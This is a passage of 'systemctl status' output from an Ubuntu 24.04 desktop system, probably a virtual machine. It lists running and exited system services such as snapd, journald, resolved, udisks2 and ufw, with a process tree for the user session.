Sep 16 19:17:23 dfa snapd-apparmor[745]: main.go:146: Loading profiles [/var/lib/snapd/apparmor/profiles/snap-confine.snapd.24792 /var/lib/snapd/apparmor/profiles/snap-update-ns.firefox /var/lib/snapd/apparmor/profiles/snap-update-ns.firmware-updater /var/lib/snapd/apparmor/profiles/snap-update-ns.snap-store /var/lib/snapd/apparmor/profiles/snap-update-ns.snapd-desktop-integration /var/lib/snapd/apparmor/profiles/snap.firefox.firefox /var/lib/snapd/apparmor/profiles/snap.firefox.geckodriver /var/lib/snapd/apparmor/profiles/snap.firefox.hook.configure /var/lib/snapd/apparmor/profiles/snap.firefox.hook.disconnect-plug-host-hunspell /var/lib/snapd/apparmor/profiles/snap.firefox.hook.install /var/lib/snapd/apparmor/profiles/snap.firefox.hook.post-refresh /var/lib/snapd/apparmor/profiles/snap.firmware-updater.firmware-notifier /var/lib/snapd/apparmor/profiles/snap.firmware-updater.firmware-updater /var/lib/snapd/apparmor/profiles/snap.firmware-updater.firmware-updater-app /var/lib/snapd/apparmor/profiles/snap.firmware-updater.hook.configure /var/lib/snapd/apparmor/profiles/snap.snap-store.hook.configure /var/lib/snapd/apparmor/profiles/snap.snap-store.show-updates /var/lib/snapd/apparmor/profiles/snap.snap-store.snap-store /var/lib/snapd/apparmor/profiles/snap.snapd-desktop-integration.hook.configure /var/lib/snapd/apparmor/profiles/snap.snapd-desktop-integration.snapd-desktop-integration]
Sep 16 19:17:23 dfa systemd[1]: Finished snapd.apparmor.service - Load AppArmor profiles managed internally by snapd.

● snapd.seeded.service - Wait until snapd is fully seeded
     Loaded: loaded (/usr/lib/systemd/system/snapd.seeded.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:26 MSK; 25min ago
   Main PID: 1200 (code=exited, status=0/SUCCESS)
        CPU: 675ms

Sep 16 19:17:23 dfa systemd[1]: Starting snapd.seeded.service - Wait until snapd is fully seeded...
Sep 16 19:17:26 dfa systemd[1]: Finished snapd.seeded.service - Wait until snapd is fully seeded.

● snapd.service - Snap Daemon
     Loaded: loaded (/usr/lib/systemd/system/snapd.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:25 MSK; 25min ago
TriggeredBy: ● snapd.socket
   Main PID: 1201 (snapd)
      Tasks: 10 (limit: 9377)
     Memory: 68.8M (peak: 77.5M)
        CPU: 1.562s
     CGroup: /system.slice/snapd.service
             └─1201 /usr/lib/snapd/snapd

Sep 16 19:17:23 dfa systemd[1]: Starting snapd.service - Snap Daemon...
Sep 16 19:17:24 dfa snapd[1201]: overlord.go:284: Acquiring state lock file
Sep 16 19:17:24 dfa snapd[1201]: overlord.go:289: Acquired state lock file
Sep 16 19:17:24 dfa snapd[1201]: daemon.go:273: started snapd/2.70 (series 16; classic) ubuntu/24.04 (amd64) linux/6.14.0-29-generic.
Sep 16 19:17:24 dfa snapd[1201]: daemon.go:367: adjusting startup timeout by 1m15s (pessimistic estimate of 30s plus 5s per snap)
Sep 16 19:17:24 dfa snapd[1201]: backends.go:68: AppArmor status: apparmor is enabled and all features are available (using snapd provided apparmor_parser)
Sep 16 19:17:25 dfa snapd[1201]: backend.go:141: delegating reload of snap-confine profiles to system snap security profiles setup
Sep 16 19:17:25 dfa systemd[1]: Started snapd.service - Snap Daemon.

● switcheroo-control.service - Switcheroo Control Proxy service
     Loaded: loaded (/usr/lib/systemd/system/switcheroo-control.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 1206 (switcheroo-cont)
      Tasks: 4 (limit: 9377)
     Memory: 1.0M (peak: 1.7M)
        CPU: 26ms
     CGroup: /system.slice/switcheroo-control.service
             └─1206 /usr/libexec/switcheroo-control

Sep 16 19:17:23 dfa systemd[1]: Starting switcheroo-control.service - Switcheroo Control Proxy service...
Sep 16 19:17:23 dfa systemd[1]: Started switcheroo-control.service - Switcheroo Control Proxy service.

● sysstat.service - Resets System Activity Logs
     Loaded: loaded (/usr/lib/systemd/system/sysstat.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:sa1(8)
             man:sadc(8)
             man:sar(1)
   Main PID: 1207 (code=exited, status=0/SUCCESS)
        CPU: 14ms

Sep 16 19:17:23 dfa systemd[1]: Starting sysstat.service - Resets System Activity Logs...
Sep 16 19:17:23 dfa systemd[1]: Finished sysstat.service - Resets System Activity Logs.

● systemd-binfmt.service - Set Up Additional Binary Formats
     Loaded: loaded (/usr/lib/systemd/system/systemd-binfmt.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:systemd-binfmt.service(8)
             man:binfmt.d(5)
             https://docs.kernel.org/admin-guide/binfmt-misc.html
             https://www.freedesktop.org/wiki/Software/systemd/APIFileSystems
   Main PID: 457 (code=exited, status=0/SUCCESS)
        CPU: 10ms

Sep 16 19:17:23 dfa systemd[1]: Finished systemd-binfmt.service - Set Up Additional Binary Formats.

● systemd-journal-flush.service - Flush Journal to Persistent Storage
     Loaded: loaded (/usr/lib/systemd/system/systemd-journal-flush.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:systemd-journald.service(8)
             man:journald.conf(5)
   Main PID: 461 (code=exited, status=0/SUCCESS)
        CPU: 8ms

Sep 16 19:17:20 dfa systemd[1]: Starting systemd-journal-flush.service - Flush Journal to Persistent Storage...
Sep 16 19:17:20 dfa systemd[1]: Finished systemd-journal-flush.service - Flush Journal to Persistent Storage.

● systemd-journald.service - Journal Service
     Loaded: loaded (/usr/lib/systemd/system/systemd-journald.service; static)
    Drop-In: /usr/lib/systemd/system/systemd-journald.service.d
             └─nice.conf
     Active: active (running) since Tue 2025-09-16 19:17:20 MSK; 25min ago
TriggeredBy: ● systemd-journald-dev-log.socket
             ● systemd-journald.socket
             ○ systemd-journald-audit.socket
       Docs: man:systemd-journald.service(8)
             man:journald.conf(5)
   Main PID: 399 (systemd-journal)
     Status: "Processing requests..."
      Tasks: 1 (limit: 9377)
   FD Store: 99 (limit: 4224)
     Memory: 24.6M (peak: 25.1M)
        CPU: 509ms
     CGroup: /system.slice/systemd-journald.service
             └─399 /usr/lib/systemd/systemd-journald

Sep 16 19:17:20 dfa systemd-journald[399]: Collecting audit messages is disabled.
Sep 16 19:17:20 dfa systemd-journald[399]: Journal started
Sep 16 19:17:20 dfa systemd-journald[399]: Runtime Journal (/run/log/journal/cb1dff4f3a424b41bc5b5baa5669801b) is 8.0M, max 78.9M, 70.9M free.
Sep 16 19:17:20 dfa systemd-journald[399]: Time spent on flushing to /var/log/journal/cb1dff4f3a424b41bc5b5baa5669801b is 104.224ms for 1721 entries.
Sep 16 19:17:20 dfa systemd-journald[399]: System Journal (/var/log/journal/cb1dff4f3a424b41bc5b5baa5669801b) is 28.7M, max 4.0G, 3.9G free.
Sep 16 19:17:20 dfa systemd-journald[399]: Received client request to flush runtime journal.
Sep 16 19:17:20 dfa systemd-journald[399]: /var/log/journal/cb1dff4f3a424b41bc5b5baa5669801b/system.journal: Journal file uses a different sequence number ID, rotating.
Sep 16 19:17:20 dfa systemd-journald[399]: Rotating system journal.
Sep 16 19:17:26 dfa systemd-journald[399]: /var/log/journal/cb1dff4f3a424b41bc5b5baa5669801b/user-1000.journal: Journal file uses a different sequence number ID, rotating.
Notice: journal has been rotated since unit was started, output may be incomplete.

● systemd-logind.service - User Login Management
     Loaded: loaded (/usr/lib/systemd/system/systemd-logind.service; static)
    Drop-In: /usr/lib/systemd/system/systemd-logind.service.d
             └─dbus.conf
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:sd-login(3)
             man:systemd-logind.service(8)
             man:logind.conf(5)
             man:org.freedesktop.login1(5)
   Main PID: 1209 (systemd-logind)
     Status: "Processing requests..."
      Tasks: 1 (limit: 9377)
   FD Store: 7 (limit: 512)
     Memory: 2.0M (peak: 2.3M)
        CPU: 140ms
     CGroup: /system.slice/systemd-logind.service
             └─1209 /usr/lib/systemd/systemd-logind

Sep 16 19:17:23 dfa systemd[1]: Starting systemd-logind.service - User Login Management...
Sep 16 19:17:23 dfa systemd-logind[1209]: New seat seat0.
Sep 16 19:17:23 dfa systemd-logind[1209]: Watching system buttons on /dev/input/event0 (Power Button)
Sep 16 19:17:23 dfa systemd-logind[1209]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Sep 16 19:17:23 dfa systemd[1]: Started systemd-logind.service - User Login Management.
Sep 16 19:17:25 dfa systemd-logind[1209]: New session 1 of user dfa.

● systemd-modules-load.service - Load Kernel Modules
     Loaded: loaded (/usr/lib/systemd/system/systemd-modules-load.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:systemd-modules-load.service(8)
             man:modules-load.d(5)
   Main PID: 414 (code=exited, status=0/SUCCESS)
        CPU: 68ms

Notice: journal has been rotated since unit was started, output may be incomplete.

● systemd-oomd.service - Userspace Out-Of-Memory (OOM) Killer
     Loaded: loaded (/usr/lib/systemd/system/systemd-oomd.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
TriggeredBy: ● systemd-oomd.socket
       Docs: man:systemd-oomd.service(8)
             man:org.freedesktop.oom1(5)
   Main PID: 701 (systemd-oomd)
     Status: "Processing requests..."
      Tasks: 1 (limit: 9377)
     Memory: 1.5M (min: 64.0M low: 64.0M peak: 2.4M)
        CPU: 388ms
     CGroup: /system.slice/systemd-oomd.service
             └─701 /usr/lib/systemd/systemd-oomd

Sep 16 19:17:20 dfa systemd[1]: Starting systemd-oomd.service - Userspace Out-Of-Memory (OOM) Killer...
Sep 16 19:17:23 dfa systemd[1]: Started systemd-oomd.service - Userspace Out-Of-Memory (OOM) Killer.

● systemd-random-seed.service - Load/Save OS Random Seed
     Loaded: loaded (/usr/lib/systemd/system/systemd-random-seed.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:systemd-random-seed.service(8)
             man:random(4)
   Main PID: 432 (code=exited, status=0/SUCCESS)
        CPU: 13ms

● systemd-remount-fs.service - Remount Root and Kernel File Systems
     Loaded: loaded (/usr/lib/systemd/system/systemd-remount-fs.service; enabled-runtime; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:systemd-remount-fs.service(8)
             https://www.freedesktop.org/wiki/Software/systemd/APIFileSystems
   Main PID: 415 (code=exited, status=0/SUCCESS)
        CPU: 8ms

Notice: journal has been rotated since unit was started, output may be incomplete.

● systemd-resolved.service - Network Name Resolution
     Loaded: loaded (/usr/lib/systemd/system/systemd-resolved.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:systemd-resolved.service(8)
             man:org.freedesktop.resolve1(5)
             https://www.freedesktop.org/wiki/Software/systemd/writing-network-configuration-managers
             https://www.freedesktop.org/wiki/Software/systemd/writing-resolver-clients
   Main PID: 705 (systemd-resolve)
     Status: "Processing requests..."
      Tasks: 1 (limit: 9377)
     Memory: 6.2M (peak: 6.7M)
        CPU: 113ms
     CGroup: /system.slice/systemd-resolved.service
             └─705 /usr/lib/systemd/systemd-resolved

Sep 16 19:17:20 dfa systemd[1]: Starting systemd-resolved.service - Network Name Resolution...
Sep 16 19:17:23 dfa systemd-resolved[705]: Positive Trust Anchors:
Sep 16 19:17:23 dfa systemd-resolved[705]: . IN DS 20326 8 2 e06d44b80b8f1d39a95c0b0d7c65d08458e880409bbc683457104237c7f8ec8d
Sep 16 19:17:23 dfa systemd-resolved[705]: Negative trust anchors: home.arpa 10.in-addr.arpa 16.172.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa 170.0.0.192.in-addr.arpa 171.0.0.192.in-addr.arpa 168.192.in-addr.arpa d.f.ip6.arpa ipv4only.arpa corp home internal intranet lan local private test
Sep 16 19:17:23 dfa systemd-resolved[705]: Using system hostname 'dfa'.
Sep 16 19:17:23 dfa systemd[1]: Started systemd-resolved.service - Network Name Resolution.
Sep 16 19:17:25 dfa systemd-resolved[705]: ens33: Bus client set search domain list to: localdomain
Sep 16 19:17:25 dfa systemd-resolved[705]: ens33: Bus client set default route setting: yes
Sep 16 19:17:25 dfa systemd-resolved[705]: ens33: Bus client set DNS server list to: 192.168.21.2
Sep 16 19:17:51 dfa systemd-resolved[705]: Clock change detected. Flushing caches.

● systemd-sysctl.service - Apply Kernel Variables
     Loaded: loaded (/usr/lib/systemd/system/systemd-sysctl.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:systemd-sysctl.service(8)
             man:sysctl.d(5)
   Main PID: 453 (code=exited, status=0/SUCCESS)
        CPU: 11ms

Sep 16 19:17:20 dfa systemd[1]: Finished systemd-sysctl.service - Apply Kernel Variables.

● systemd-timesyncd.service - Network Time Synchronization
     Loaded: loaded (/usr/lib/systemd/system/systemd-timesyncd.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:systemd-timesyncd.service(8)
   Main PID: 706 (systemd-timesyn)
     Status: "Contacted time server 185.125.190.58:123 (ntp.ubuntu.com)."
      Tasks: 2 (limit: 9377)
     Memory: 1.6M (peak: 2.1M)
        CPU: 49ms
     CGroup: /system.slice/systemd-timesyncd.service
             └─706 /usr/lib/systemd/systemd-timesyncd

Sep 16 19:17:20 dfa systemd[1]: Starting systemd-timesyncd.service - Network Time Synchronization...
Sep 16 19:17:23 dfa systemd[1]: Started systemd-timesyncd.service - Network Time Synchronization.
Sep 16 19:17:51 dfa systemd-timesyncd[706]: Contacted time server 185.125.190.58:123 (ntp.ubuntu.com).
Sep 16 19:17:51 dfa systemd-timesyncd[706]: Initial clock synchronization to Tue 2025-09-16 19:17:51.891170 MSK.

● systemd-tmpfiles-setup-dev-early.service - Create Static Device Nodes in /dev gracefully
     Loaded: loaded (/usr/lib/systemd/system/systemd-tmpfiles-setup-dev-early.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:tmpfiles.d(5)
             man:systemd-tmpfiles(8)
   Main PID: 429 (code=exited, status=0/SUCCESS)
        CPU: 13ms

● systemd-tmpfiles-setup-dev.service - Create Static Device Nodes in /dev
     Loaded: loaded (/usr/lib/systemd/system/systemd-tmpfiles-setup-dev.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:tmpfiles.d(5)
             man:systemd-tmpfiles(8)
   Main PID: 437 (code=exited, status=0/SUCCESS)
        CPU: 9ms

● systemd-tmpfiles-setup.service - Create Volatile Files and Directories
     Loaded: loaded (/usr/lib/systemd/system/systemd-tmpfiles-setup.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:tmpfiles.d(5)
             man:systemd-tmpfiles(8)
   Main PID: 602 (code=exited, status=0/SUCCESS)
        CPU: 50ms

Sep 16 19:17:20 dfa systemd[1]: Starting systemd-tmpfiles-setup.service - Create Volatile Files and Directories...
Sep 16 19:17:20 dfa systemd[1]: Finished systemd-tmpfiles-setup.service - Create Volatile Files and Directories.

● systemd-udev-trigger.service - Coldplug All udev Devices
     Loaded: loaded (/usr/lib/systemd/system/systemd-udev-trigger.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:udev(7)
             man:systemd-udevd.service(8)
   Main PID: 418 (code=exited, status=0/SUCCESS)
        CPU: 265ms

Sep 16 19:17:20 dfa systemd[1]: Finished systemd-udev-trigger.service - Coldplug All udev Devices.
Notice: journal has been rotated since unit was started, output may be incomplete.

● systemd-udevd.service - Rule-based Manager for Device Events and Files
     Loaded: loaded (/usr/lib/systemd/system/systemd-udevd.service; static)
    Drop-In: /usr/lib/systemd/system/systemd-udevd.service.d
             └─syscall-architecture.conf
     Active: active (running) since Tue 2025-09-16 19:17:20 MSK; 25min ago
TriggeredBy: ● systemd-udevd-control.socket
             ● systemd-udevd-kernel.socket
       Docs: man:systemd-udevd.service(8)
             man:udev(7)
   Main PID: 452 (systemd-udevd)
     Status: "Processing with 24 children at max"
      Tasks: 1
     Memory: 26.6M (peak: 43.2M)
        CPU: 2.683s
     CGroup: /system.slice/systemd-udevd.service
             └─udev
               └─452 /usr/lib/systemd/systemd-udevd

Sep 16 19:17:20 dfa systemd-udevd[452]: Using default interface naming scheme 'v255'.
Sep 16 19:17:20 dfa systemd[1]: Started systemd-udevd.service - Rule-based Manager for Device Events and Files.
Sep 16 19:17:20 dfa mtp-probe[758]: checking bus 1, device 2: "/sys/devices/pci0000:00/0000:00:11.0/0000:02:00.0/usb1/1-1"
Sep 16 19:17:20 dfa mtp-probe[758]: bus: 1, device: 2 was not an MTP device
Sep 16 19:17:23 dfa (udev-worker)[510]: id: Truncating stdout of 'dmi_memory_id' up to 16384 byte.

● systemd-update-utmp.service - Record System Boot/Shutdown in UTMP
     Loaded: loaded (/usr/lib/systemd/system/systemd-update-utmp.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:systemd-update-utmp.service(8)
             man:utmp(5)
   Main PID: 707 (code=exited, status=0/SUCCESS)
        CPU: 17ms

Sep 16 19:17:20 dfa systemd[1]: Starting systemd-update-utmp.service - Record System Boot/Shutdown in UTMP...
Sep 16 19:17:20 dfa systemd[1]: Finished systemd-update-utmp.service - Record System Boot/Shutdown in UTMP.

● systemd-user-sessions.service - Permit User Sessions
     Loaded: loaded (/usr/lib/systemd/system/systemd-user-sessions.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:25 MSK; 25min ago
       Docs: man:systemd-user-sessions.service(8)
   Main PID: 1465 (code=exited, status=0/SUCCESS)
        CPU: 11ms

Sep 16 19:17:25 dfa systemd[1]: Starting systemd-user-sessions.service - Permit User Sessions...
Sep 16 19:17:25 dfa systemd[1]: Finished systemd-user-sessions.service - Permit User Sessions.

● udisks2.service - Disk Manager
     Loaded: loaded (/usr/lib/systemd/system/udisks2.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:udisks(8)
   Main PID: 1218 (udisksd)
      Tasks: 6 (limit: 9377)
     Memory: 8.9M (peak: 9.4M)
        CPU: 107ms
     CGroup: /system.slice/udisks2.service
             └─1218 /usr/libexec/udisks2/udisksd

Sep 16 19:17:23 dfa systemd[1]: Starting udisks2.service - Disk Manager...
Sep 16 19:17:23 dfa udisksd[1218]: udisks daemon version 2.10.1 starting
Sep 16 19:17:23 dfa udisksd[1218]: Acquired the name org.freedesktop.UDisks2 on the system message bus
Sep 16 19:17:23 dfa systemd[1]: Started udisks2.service - Disk Manager.

● ufw.service - Uncomplicated firewall
     Loaded: loaded (/usr/lib/systemd/system/ufw.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:ufw(8)
   Main PID: 459 (code=exited, status=0/SUCCESS)
        CPU: 6ms

Sep 16 19:17:20 dfa systemd[1]: Finished ufw.service - Uncomplicated firewall.

● unattended-upgrades.service - Unattended Upgrades Shutdown
     Loaded: loaded (/usr/lib/systemd/system/unattended-upgrades.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:25 MSK; 25min ago
       Docs: man:unattended-upgrade(8)
   Main PID: 1468 (unattended-upgr)
      Tasks: 2 (limit: 9377)
     Memory: 11.2M (peak: 11.5M)
        CPU: 64ms
     CGroup: /system.slice/unattended-upgrades.service
             └─1468 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal

Sep 16 19:17:25 dfa systemd[1]: Started unattended-upgrades.service - Unattended Upgrades Shutdown.

● upower.service - Daemon for power management
     Loaded: loaded (/usr/lib/systemd/system/upower.service; disabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:28 MSK; 25min ago
       Docs: man:upowerd(8)
   Main PID: 1952 (upowerd)
      Tasks: 4 (limit: 9377)
     Memory: 2.5M (peak: 3.1M)
        CPU: 65ms
     CGroup: /system.slice/upower.service
             └─1952 /usr/libexec/upowerd

Sep 16 19:17:28 dfa systemd[1]: Starting upower.service - Daemon for power management...
Sep 16 19:17:28 dfa systemd[1]: Started upower.service - Daemon for power management.

● user-runtime-dir@1000.service - User Runtime Directory /run/user/1000
     Loaded: loaded (/usr/lib/systemd/system/user-runtime-dir@.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:26 MSK; 25min ago
       Docs: man:user@.service(5)
   Main PID: 1494 (code=exited, status=0/SUCCESS)
        CPU: 13ms

Sep 16 19:17:25 dfa systemd[1]: Starting user-runtime-dir@1000.service - User Runtime Directory /run/user/1000...
Sep 16 19:17:26 dfa systemd[1]: Finished user-runtime-dir@1000.service - User Runtime Directory /run/user/1000.

● user@1000.service - User Manager for UID 1000
     Loaded: loaded (/usr/lib/systemd/system/user@.service; static)
    Drop-In: /usr/lib/systemd/system/user@.service.d
             └─10-login-barrier.conf, 10-oomd-user-service-defaults.conf, timeout.conf
     Active: active (running) since Tue 2025-09-16 19:17:26 MSK; 25min ago
       Docs: man:user@.service(5)
   Main PID: 1497 (systemd)
     Status: "Ready."
      Tasks: 380
     Memory: 1.2G (peak: 1.4G)
        CPU: 1min 5.156s
     CGroup: /user.slice/user-1000.slice/user@1000.service
             ├─app.slice
             │ ├─app-gnome-at\x2dspi\x2ddbus\x2dbus-1717.scope
             │ │ ├─1717 /usr/libexec/at-spi-bus-launcher --launch-immediately
             │ │ ├─1730 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus
             │ │ └─1854 /usr/libexec/at-spi2-registryd --use-gnome-session
             │ ├─app-gnome-org.gnome.Evolution\x2dalarm\x2dnotify-2074.scope
             │ │ └─2074 /usr/libexec/evolution-data-server/evolution-alarm-notify
             │ ├─app-gnome-org.gnome.SettingsDaemon.DiskUtilityNotify-2006.scope
             │ │ └─2006 /usr/libexec/gsd-disk-utility-notify
             │ ├─app-gnome-update\x2dnotifier-2698.scope
             │ │ └─2698 /usr/bin/update-notifier
             │ ├─app-gnome-x\x2dterminal\x2demulator-2664.scope
             │ │ ├─2664 /usr/bin/python3 /usr/bin/gnome-terminal --wait
             │ │ └─2666 /usr/bin/gnome-terminal.real --wait
             │ ├─app-gnome-x\x2dterminal\x2demulator-4013.scope
             │ │ ├─4013 /usr/bin/python3 /usr/bin/gnome-terminal --wait
             │ │ └─4016 /usr/bin/gnome-terminal.real --wait
             │ ├─app-gnome\x2dsession\x2dmanager.slice
             │ │ └─gnome-session-manager@ubuntu.service
             │ │   ├─1686 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu
             │ │   └─2021 /usr/bin/vmtoolsd -n vmusr --blockFd 3 --uinputFd 4
             │ ├─app-org.gnome.Terminal.slice
             │ │ ├─gnome-terminal-server.service
             │ │ │ └─2672 /usr/libexec/gnome-terminal-server
             │ │ ├─vte-spawn-55e229f3-0414-45bf-8b10-ef4f68e99ef2.scope
             │ │ │ ├─4022 bash
             │ │ │ └─4497 systemctl status --type=service --no-pager
             │ │ └─vte-spawn-92342e4b-6dfa-4142-804d-b14037dbd890.scope
             │ │   └─2680 bash
             │ ├─dconf.service
             │ │ └─2309 /usr/libexec/dconf-service
             │ ├─evolution-addressbook-factory.service
             │ │ └─2263 /usr/libexec/evolution-addressbook-factory
             │ ├─evolution-calendar-factory.service
             │ │ └─1982 /usr/libexec/evolution-calendar-factory
             │ ├─evolution-source-registry.service
             │ │ └─1902 /usr/libexec/evolution-source-registry
             │ ├─gcr-ssh-agent.service
             │ │ └─1654 /usr/libexec/gcr-ssh-agent --base-dir /run/user/1000/gcr
             │ ├─gnome-keyring-daemon.service
             │ │ ├─1535 /usr/bin/gnome-keyring-daemon --foreground --components=pkcs11,secrets --control-directory=/run/user/1000/keyring
             │ │ └─4062 /usr/bin/ssh-agent -D -a /run/user/1000/keyring/.ssh
             │ ├─gnome-session-monitor.service
             │ │ └─1655 /usr/libexec/gnome-session-ctl --monitor
             │ ├─snap.snapd-desktop-integration.snapd-desktop-integration.service
             │ │ ├─2412 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
             │ │ └─2498 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
             │ ├─xdg-desktop-portal-gnome.service
             │ │ └─2414 /usr/libexec/xdg-desktop-portal-gnome
             │ └─xdg-desktop-portal-gtk.service
             │   └─2552 /usr/libexec/xdg-desktop-portal-gtk
             ├─background.slice
             │ └─tracker-miner-fs-3.service
             │   └─2390 /usr/libexec/tracker-miner-fs-3
             ├─init.scope
             │ ├─1497 /usr/lib/systemd/systemd --user
             │ └─1501 "(sd-pam)"
             └─session.slice
               ├─dbus.service
               │ ├─1549 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
               │ ├─1891 /usr/libexec/gnome-shell-calendar-server
               │ ├─1913 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.Shell.Notifications
               │ ├─1936 /usr/libexec/goa-daemon
               │ ├─1946 /usr/libexec/goa-identity-service
               │ ├─2166 /usr/libexec/ibus-portal
               │ └─2423 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.ScreenSaver
               ├─filter-chain.service
               │ └─1530 /usr/bin/pipewire -c filter-chain.conf
               ├─gvfs-afc-volume-monitor.service
               │ └─2257 /usr/libexec/gvfs-afc-volume-monitor
               ├─gvfs-daemon.service
               │ ├─1677 /usr/libexec/gvfsd
               │ ├─1683 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
               │ └─2357 /usr/libexec/gvfsd-trash --spawner :1.19 /org/gtk/gvfs/exec_spaw/0
               ├─gvfs-goa-volume-monitor.service
               │ └─2240 /usr/libexec/gvfs-goa-volume-monitor
               ├─gvfs-gphoto2-volume-monitor.service
               │ └─2280 /usr/libexec/gvfs-gphoto2-volume-monitor
               ├─gvfs-metadata.service
               │ └─2242 /usr/libexec/gvfsd-metadata
               ├─gvfs-mtp-volume-monitor.service
               │ └─2269 /usr/libexec/gvfs-mtp-volume-monitor
               ├─gvfs-udisks2-volume-monitor.service
               │ └─1983 /usr/libexec/gvfs-udisks2-volume-monitor
               ├─org.freedesktop.IBus.session.GNOME.service
               │ ├─1954 /usr/bin/ibus-daemon --panel disable
               │ ├─2150 /usr/libexec/ibus-dconf
               │ ├─2155 /usr/libexec/ibus-extension-gtk3
               │ └─2303 /usr/libexec/ibus-engine-simple
               ├─org.gnome.SettingsDaemon.A11ySettings.service
               │ └─1956 /usr/libexec/gsd-a11y-settings
               ├─org.gnome.SettingsDaemon.Color.service
               │ └─1957 /usr/libexec/gsd-color
               ├─org.gnome.SettingsDaemon.Datetime.service
               │ └─1958 /usr/libexec/gsd-datetime
               ├─org.gnome.SettingsDaemon.Housekeeping.service
               │ └─1959 /usr/libexec/gsd-housekeeping
               ├─org.gnome.SettingsDaemon.Keyboard.service
               │ └─1960 /usr/libexec/gsd-keyboard
               ├─org.gnome.SettingsDaemon.MediaKeys.service
               │ └─1961 /usr/libexec/gsd-media-keys
               ├─org.gnome.SettingsDaemon.Power.service
               │ └─1967 /usr/libexec/gsd-power
               ├─org.gnome.SettingsDaemon.PrintNotifications.service
               │ ├─1969 /usr/libexec/gsd-print-notifications
               │ └─2216 /usr/libexec/gsd-printer
               ├─org.gnome.SettingsDaemon.Rfkill.service
               │ └─1971 /usr/libexec/gsd-rfkill
               ├─org.gnome.SettingsDaemon.ScreensaverProxy.service
               │ └─1974 /usr/libexec/gsd-screensaver-proxy
               ├─org.gnome.SettingsDaemon.Sharing.service
               │ └─1976 /usr/libexec/gsd-sharing
               ├─org.gnome.SettingsDaemon.Smartcard.service
               │ └─1979 /usr/libexec/gsd-smartcard
               ├─org.gnome.SettingsDaemon.Sound.service
               │ └─1980 /usr/libexec/gsd-sound
               ├─org.gnome.SettingsDaemon.Wacom.service
               │ └─1981 /usr/libexec/gsd-wacom
               ├─org.gnome.SettingsDaemon.XSettings.service
               │ ├─2522 /usr/libexec/gsd-xsettings
               │ └─2572 /usr/libexec/ibus-x11
               ├─org.gnome.Shell@wayland.service
               │ ├─1716 /usr/bin/gnome-shell
               │ ├─2287 /usr/bin/Xwayland :0 -rootless -noreset -accessx -core -auth /run/user/1000/.mutter-Xwaylandauth.IWXLC3 -listenfd 4 -listenfd 5 -displayfd 6 -initfd 7 -byteswappedclients
               │ ├─2523 gjs /usr/share/gnome-shell/extensions/ding@rastersoft.com/app/ding.js -E -P /usr/share/gnome-shell/extensions/ding@rastersoft.com/app
               │ └─2576 /usr/libexec/mutter-x11-frames
               ├─pipewire-pulse.service
               │ └─1534 /usr/bin/pipewire-pulse
               ├─pipewire.service
               │ └─1529 /usr/bin/pipewire
               ├─wireplumber.service
               │ └─1532 /usr/bin/wireplumber
               ├─xdg-desktop-portal.service
               │ └─2397 /usr/libexec/xdg-desktop-portal
               ├─xdg-document-portal.service
               │ ├─1588 /usr/libexec/xdg-document-portal
               │ └─1634 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
               └─xdg-permission-store.service
                 └─1616 /usr/libexec/xdg-permission-store

